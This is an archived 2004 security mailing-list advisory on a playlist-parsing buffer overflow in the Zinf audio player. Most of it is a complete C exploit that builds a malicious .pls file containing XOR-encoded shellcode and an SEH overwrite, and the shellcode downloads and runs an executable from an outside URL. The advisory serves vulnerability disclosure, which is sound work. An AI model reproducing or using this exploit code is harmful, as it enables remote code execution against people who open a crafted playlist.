[NEWS] Znif PLS Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 10/04/04

  • Next message: SecuriTeam: "[NEWS] Xerces-C++ Library Attribute Parsing Denial Of Service" 
    To: list@securiteam.com
Date: 4 Oct 2004 14:20:53 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Znif PLS Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

    In short, <http://www.zinf.org> Zinf is an audio player for Linux and
    Windows. The program is vulnerable to a buffer overflow bug in the way it
    handles playlists (".pls").

    DETAILS

    Vulnerable Systems:
     * Znif for Windows version 2.2.1 and prior
     * Znif Linux version 2.2.4 and prior

    Immune Systems:
     * Znif Linux version 2.2.5

    Exploit:
    /*
    this exploit generates a file exploit.pls which overflows a seh handler
    jumps into a service pack independent address then it downloads and
    executes a file

      you can also download this exploit i a rar file(www.delikon.de).
      in this rar file you will find some screenshots, from OllyDbg
      which is maybe useful for beginners
    */

    #include <stdio.h>
    #include <windows.h>

    #define SIZE 4048

    char shellcode[] = "\xEB"//xored with 0x1d
    "\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
    "\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
    "\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
    "\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
    "\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
    "\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
    "\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
    "\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
    "\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
    "\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
    "\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
    "\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
    "\x78\x65\x78\x1D";

    int main(){

    char buffer[SIZE];
    char exploit[]="exploit.pls";
    char head[]="[playlist]File1=";
    int i=0;
    ULONG bytes=0;
    char *pointer=NULL;
    //for the decoder
    short int weblength=0xff22;

    ULONG RetAddr=0x10404DC4;
    /*
    SERVICE PACK independent
    httpinput.pmi
    10404DC4 5D POP EBP
    10404DC5 B8 18000000 MOV EAX,18
    10404DCA 5B POP EBX
    10404DCB C2 0800 RETN 8
    */
    //jump into nops
    DWORD jump=0x909025eb;
    HANDLE file=NULL;

    //this is a small messageBox app
    char web[]="http://www.delikon.de/klein.exe";

    printf("A Buffer overflow exploit against Zinf 2.2.1 for Win32\n");
    printf("Coded by Delikon|www.delikon.de|27.9.04\n");
    printf("all credits goes to Luigi Auriemma\n");
    printf("\n [+] generate exploit.pls\n");

    memset(buffer,0x00,SIZE-1);

     file = CreateFile(exploit,
    GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,NULL);

    if(file == (HANDLE)0xffffffff){

     printf("\t[+] error opening the file\n");
     printf("PRESS A KEY\n");
     getchar();
     return -1;

    }
     strcpy(buffer,head);
     
     memset(buffer+strlen(buffer),0x61,17);
     //nops
     memset(buffer+strlen(buffer),0x90,20);
     //
     strcat(buffer,shellcode);
     //search for the shellcode length
     pointer=strstr(buffer,"\x22\xff");
     //weblength[0]-=strlen(web)+1;
     weblength-=strlen(web)+1;
     //increase it
     memcpy(pointer,&weblength,2);
     

     //copy the url in the buffer
     strcat(buffer,web);

     //xor the url with 0x1d
     while(*(buffer+strlen(buffer)-strlen(web)+i)){

     
      
    *(buffer+strlen(buffer)-strlen(web)+i)=*(buffer+strlen(buffer)-strlen(web)+i)^0x1d;
      i++;
     }
     
     *(buffer+strlen(buffer)-strlen(web)+i)=0x1d;

     //copy the filling
     memset(buffer+strlen(buffer),0x61,517-strlen(buffer));
     //also filling ;)
     memcpy(buffer+strlen(buffer),&RetAddr,4);
     
     memset(buffer+strlen(buffer),0x41,4);
     memset(buffer+strlen(buffer),0x42,4);
      
     //jump 24 bytes forward
     memcpy(buffer+strlen(buffer),&jump,4);
     //jump into pop reg pop reg ret
     memcpy(buffer+strlen(buffer),&RetAddr,4);
     memset(buffer+strlen(buffer),0x45,4);
     memset(buffer+strlen(buffer),0x46,4);
     memset(buffer+strlen(buffer),0x47,4);
     
     

     WriteFile(file,buffer,strlen(buffer),&bytes,0);

     CloseHandle(file);
     printf("\n [+] ready press a key\n");
     getchar();

     exit(1);

    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:aluigi@autistic.org> Luigi
    Auriemma.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Xerces-C++ Library Attribute Parsing Denial Of Service"

    Relevant Pages